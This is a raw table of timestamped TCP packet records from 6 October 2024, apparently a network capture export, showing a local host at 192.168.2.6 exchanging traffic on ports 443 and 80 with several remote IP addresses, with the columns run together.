                                                                                                                            Oct 6, 2024 13:50:07.329684019 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.331172943 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.331238985 CEST49745443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.331517935 CEST49745443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.331597090 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.331828117 CEST49745443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.331835032 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.337106943 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.337667942 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:07.337691069 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.337800980 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:07.337958097 CEST49751443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:07.337964058 CEST44349751104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.339435101 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.339447975 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.341923952 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.341984987 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.342108965 CEST4975080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.344786882 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.344831944 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.344880104 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.344888926 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.346868038 CEST8049750165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.347635031 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.347718000 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.347724915 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.353943110 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.353981018 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.353986979 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.360369921 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.360436916 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.360443115 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.366590977 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.366637945 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.366648912 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.372853994 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.372917891 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.372924089 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.376733065 CEST49746443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.376733065 CEST49747443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.376741886 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.376765966 CEST49745443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.379237890 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.379301071 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.379307032 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.385423899 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.385478973 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.385484934 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.423440933 CEST49746443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.431602955 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.431668997 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.431675911 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.436650991 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.436727047 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.436733961 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.440522909 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.440587997 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.440594912 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.446748972 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.446784019 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.446789980 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.453089952 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.453139067 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.453146935 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.459434986 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.459492922 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.459510088 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.465672016 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.466670036 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.466718912 CEST49746443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.466727972 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.466890097 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.466919899 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.466939926 CEST49746443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.466945887 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.466979027 CEST49746443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.467004061 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.467068911 CEST4434974723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.467175007 CEST4434974723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.467506886 CEST49747443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.468452930 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.468511105 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.468518019 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.470829010 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.470895052 CEST49746443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.471988916 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.472054005 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.472062111 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.472615957 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.472826004 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.472867012 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.472888947 CEST49745443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.472894907 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.472938061 CEST49745443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.472943068 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.472968102 CEST4434974523.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.473010063 CEST49745443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.476948977 CEST4434974413.107.246.60192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.477042913 CEST49744443192.168.2.613.107.246.60
                                                                                                                            Oct 6, 2024 13:50:07.478455067 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.478508949 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.478517056 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.480019093 CEST49746443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.480031013 CEST4434974623.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.482970953 CEST49747443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:07.482990026 CEST4434974723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.484339952 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.484385967 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.484392881 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.492703915 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.492785931 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.492793083 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.507049084 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.507103920 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.507103920 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.507124901 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.507226944 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.507272959 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.507282972 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.507323027 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.507409096 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.511627913 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.511698008 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.511706114 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.521481037 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.521545887 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.521563053 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.521569967 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.521850109 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.524905920 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.528065920 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.528124094 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.528125048 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.528136969 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.528177977 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.530777931 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.533937931 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.533998013 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.534006119 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.534013033 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.534132957 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.537691116 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.541110039 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.541153908 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.541198969 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.541215897 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.541275978 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.544615984 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.551191092 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.551239967 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.551249027 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.551455975 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.551506996 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.551515102 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.555108070 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.555157900 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.555186033 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.555193901 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.555248022 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.559118032 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.562000990 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.562043905 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.562060118 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.565609932 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.565671921 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.565685987 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.565696001 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.565763950 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.569051027 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.572590113 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.572657108 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.572701931 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.572710037 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.572752953 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.576311111 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.579921007 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.579967976 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.579968929 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.579988003 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.580029964 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.583067894 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.598217964 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.598264933 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.598313093 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.598315001 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.598325014 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.598392010 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.598402977 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.598443985 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.598452091 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.600192070 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.600239992 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.600251913 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.600260019 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.600333929 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.600388050 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.600397110 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.600538015 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.603780985 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.606154919 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.606200933 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.606225014 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.606232882 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.606271029 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.609006882 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.612261057 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.612304926 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.612307072 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.612319946 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.612389088 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.615200996 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.617269993 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.617314100 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.617357969 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.617369890 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.617379904 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.617398024 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.619304895 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.619365931 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.619373083 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.621366978 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.621433973 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.621442080 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.624197006 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.624263048 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.624269962 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.625385046 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.625421047 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.625437975 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.627454042 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.627515078 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.627522945 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.629427910 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.630193949 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.630199909 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.631586075 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.631649017 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.631655931 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.633486986 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.633539915 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.633547068 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.635329008 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.635380030 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.635395050 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.637254000 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.637321949 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.637340069 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.638999939 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.639280081 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.639287949 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.640851974 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.640923023 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.640933037 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.642633915 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.642678976 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.642685890 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.644593954 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.644659042 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.644668102 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.646219969 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.646269083 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.646275997 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.647968054 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.648180008 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.648188114 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.649873018 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.649952888 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.649960995 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.651448965 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.651509047 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.651516914 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.653343916 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.653430939 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.653443098 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.654884100 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.655400038 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.655411005 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.656615019 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.656651974 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.656660080 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657351971 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657418966 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657433033 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657447100 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657474995 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657490015 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657504082 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657505035 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.657505989 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.657520056 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657535076 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657546997 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.657552004 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.657568932 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.657588005 CEST4973980192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:07.658150911 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.658412933 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.658421993 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.660057068 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.660175085 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.660181999 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.661384106 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.661427975 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:07.661437988 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.662420034 CEST8049739165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:07.662477970 CEST8049739165.22.241.119192.168.2.6
